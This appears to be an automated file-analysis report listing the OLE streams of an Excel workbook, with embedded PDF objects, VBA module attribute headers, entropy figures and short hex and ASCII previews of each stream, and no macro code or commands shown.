                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w t . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b5 77 74 04 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "Sheet1"
                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:985
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 b5 77 a4 c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Attribute VB_Name = "ThisWorkbook"
                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                Attribute VB_GlobalNameSpace = False
                                                Attribute VB_Creatable = False
                                                Attribute VB_PredeclaredId = True
                                                Attribute VB_Exposed = True
                                                Attribute VB_TemplateDerived = False
                                                Attribute VB_Customizable = True
                                                

                                                General
                                                Stream Path:\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:244
                                                Entropy:2.889430592781307
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                General
                                                Stream Path:\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:200
                                                Entropy:3.2383985198771654
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 3 } . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                General
                                                Stream Path:MBD0010AD4D/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:94
                                                Entropy:4.345966460061678
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD4D/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:62
                                                Entropy:2.7788384466112834
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 6 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 36 00
                                                General
                                                Stream Path:MBD0010AD4D/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.7
                                                Stream Size:20409
                                                Entropy:7.983582411785068
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 7 . % . 2 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 4 0 R . / A c r o F o r m 5 0 R . > > . e n d o b j . 9 0 o b j . < < . / F i l t e r / F l a t e D e c o d e . / L e n g t h 3 8 . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3 9 K ? @ % + . . . + . . e n d s t r e a m . e n d o b j . 1 1 0 o b j . < < . / T y p e / X O b j e c t . / S u b t y p e / I m a g e . / W i d t h 9 6 5 . / H e i g h t 5 4 3 . / B i t s P e r C o m p o
                                                Data Raw:25 50 44 46 2d 31 2e 37 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 35 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 39 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 4c 65 6e 67 74 68 20 33 38 0a 3e 3e 0a 73 74
                                                General
                                                Stream Path:MBD0010AD4E/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:94
                                                Entropy:4.345966460061678
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD4E/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:62
                                                Entropy:2.7788384466112834
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 5 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 35 00
                                                General
                                                Stream Path:MBD0010AD4E/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.7, 1 pages
                                                Stream Size:141190
                                                Entropy:7.918921120478072
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 7 . % . . 1 0 o b j . . < < / O u t l i n e s 5 0 R . . / P a g e s 2 0 R . . / N a m e s < < / D e s t s 4 0 R . . > > . . / T y p e / C a t a l o g . . > > . . e n d o b j . . 2 0 o b j . . < < / C o u n t 1 . . / K i d s [ 6 0 R ] . . / T y p e / P a g e s . . > > . . e n d o b j . . 3 0 o b j . . < < / C r e a t i o n D a t e ( D : 2 0 2 2 0 7 0 1 1 0 0 4 1 7 + 0 2 ' 0 4 ' ) . . / M o d D a t e ( D : 2 0 2 2 0 9 2 6 1 9 4 4 0 7 + 0 8 ' 0 0 '
                                                Data Raw:25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 4f 75 74 6c 69 6e 65 73 20 35 20 30 20 52 0d 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0d 0a 2f 4e 61 6d 65 73 20 3c 3c 2f 44 65 73 74 73 20 34 20 30 20 52 0d 0a 3e 3e 0d 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0d 0a 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 43 6f 75
                                                General
                                                Stream Path:MBD0010AD4F/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:93
                                                Entropy:4.2892020709435155
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD4F/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:64
                                                Entropy:2.892622069467395
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 1 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 31 00
                                                General
                                                Stream Path:MBD0010AD4F/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.4, 1 pages
                                                Stream Size:124841
                                                Entropy:7.657052848938946
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 4 . . % . . % . . % w P D F b y W P C u b e d G m b H V 3 . 5 4 x [ 0 ] . . % . . % . . 1 0 o b j . < < / T y p e / M e t a d a t a / S u b t y p e / X M L / L e n g t h 1 4 4 7 > > . . s t r e a m . < ? x p a c k e t b e g i n = " . " i d = " W 5 M 0 M p C e h i H z r e S z N T c z k c 9 d " ? > . < x : x m p m e t a x m l n s : x = " a d o b e : n s : m e t a / " x : x m p t k = " 3 . 1 - 7 0 1 " > . < r d f : R D F x m l n s : r d f = " h t t p : / / w w w . w 3 .
                                                Data Raw:25 50 44 46 2d 31 2e 34 0d 0a 25 e2 e3 cf d3 0d 0a 25 0d 0a 25 77 50 44 46 20 62 79 20 57 50 43 75 62 65 64 20 47 6d 62 48 20 56 33 2e 35 34 78 5b 30 5d 0d 0a 25 0d 0a 25 0d 0a 31 20 30 20 6f 62 6a 0d 3c 3c 2f 54 79 70 65 2f 4d 65 74 61 64 61 74 61 2f 53 75 62 74 79 70 65 2f 58 4d 4c 2f 4c 65 6e 67 74 68 20 31 34 34 37 20 3e 3e 0d 0a 73 74 72 65 61 6d 0a 3c 3f 78 70 61 63 6b 65 74
                                                General
                                                Stream Path:MBD0010AD50/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:93
                                                Entropy:4.2892020709435155
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o b a t . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 14 00 00 00 41 63 72 6f 62 61 74 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD50/\x1Ole
                                                CLSID:
                                                File Type:data
                                                Stream Size:64
                                                Entropy:2.892622069467395
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 1 ! O b j e c t 6 9 0 .
                                                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 53 68 65 65 74 31 21 4f 62 6a 65 63 74 20 36 39 30 00
                                                General
                                                Stream Path:MBD0010AD50/CONTENTS
                                                CLSID:
                                                File Type:PDF document, version 1.5
                                                Stream Size:66661
                                                Entropy:7.946317330962055
                                                Base64 Encoded:True
                                                Data ASCII:% P D F - 1 . 5 . % . 2 0 o b j . < < . / P a g e s 4 0 R . / T y p e / C a t a l o g . / O u t p u t I n t e n t s 5 0 R . / M e t a d a t a 6 0 R . / A c r o F o r m 7 0 R . / V e r s i o n / 1 # 2 E 5 . > > . e n d o b j . 6 0 o b j . < < . / T y p e / M e t a d a t a . / S u b t y p e / X M L . / F i l t e r / F l a t e D e c o d e . / L e n g t h 4 5 4 . > > . s t r e a m . . x n 0 . . S X . 6 _ Q . U 4 : m Q . # c . . W M X T . . H > > . } | . l . M . / . T
                                                Data Raw:25 50 44 46 2d 31 2e 35 0a 25 a7 e3 f1 f1 0a 32 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 61 67 65 73 20 34 20 30 20 52 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 4f 75 74 70 75 74 49 6e 74 65 6e 74 73 20 35 20 30 20 52 0a 2f 4d 65 74 61 64 61 74 61 20 36 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 37 20 30 20 52 0a 2f 56 65 72 73 69 6f 6e 20 2f 31 23 32 45 35 0a 3e 3e 0a 65 6e
                                                General
                                                Stream Path:MBD0010AD51/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:114
                                                Entropy:4.25248375192737
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD51/\x5DocumentSummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:708
                                                Entropy:3.6235698530352805
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                                                General
                                                Stream Path:MBD0010AD51/\x5SummaryInformation
                                                CLSID:
                                                File Type:data
                                                Stream Size:372
                                                Entropy:2.882764232203768
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                                                General
                                                Stream Path:MBD0010AD51/Workbook
                                                CLSID:
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:97872
                                                Entropy:7.364630739316353
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . .
                                                Data Raw:09 08 10 00 00 06 05 00 aa 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/PROJECT
                                                CLSID:
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:416
                                                Entropy:5.32126484407899
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { E 1 4 9 E 7 C 1 - F C 0 1 - 4 3 4 8 - B 7 3 5 - 0 F A 0 A F E 5 6 1 0 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F A F 8 2 A 7 0 E 6 7 4 E 6 7 4 E 6 7 4 E 6 7 4 " . . D P B = " B 2 B 0 6 2 3 8 1 B 3 9 1 B 3 9 1 B " . . G C = " 6 A 6 8 B A 8 0 7 3 8 1 7 3 8 1
                                                Data Raw:49 44 3d 22 7b 45 31 34 39 45 37 43 31 2d 46 43 30 31 2d 34 33 34 38 2d 42 37 33 35 2d 30 46 41 30 41 46 45 35 36 31 30 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65
                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/PROJECTwm
                                                CLSID:
                                                File Type:data
                                                Stream Size:62
                                                Entropy:3.0554671543224337
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                CLSID:
                                                File Type:data
                                                Stream Size:2329
                                                Entropy:3.8405646415341126
                                                Base64 Encoded:False
                                                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                General
                                                Stream Path:MBD0010AD51/_VBA_PROJECT_CUR/VBA/dir
                                                CLSID:
                                                File Type:PDP-11 UNIX/RT ldp
                                                Stream Size:517
                                                Entropy:6.295528215964339
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e 6 g . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                Data Raw:01 01 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 af 65 36 67 17 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                General
                                                Stream Path:MBD0010AD52/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:99
                                                Entropy:3.631242196770981
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD52/Package
                                                CLSID:
                                                File Type:Microsoft Excel 2007+
                                                Stream Size:7942
                                                Entropy:6.567858865491943
                                                Base64 Encoded:True
                                                Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                General
                                                Stream Path:MBD0010AD53/\x1CompObj
                                                CLSID:
                                                File Type:data
                                                Stream Size:93
                                                Entropy:4.2892020709435155
                                                Base64 Encoded:False
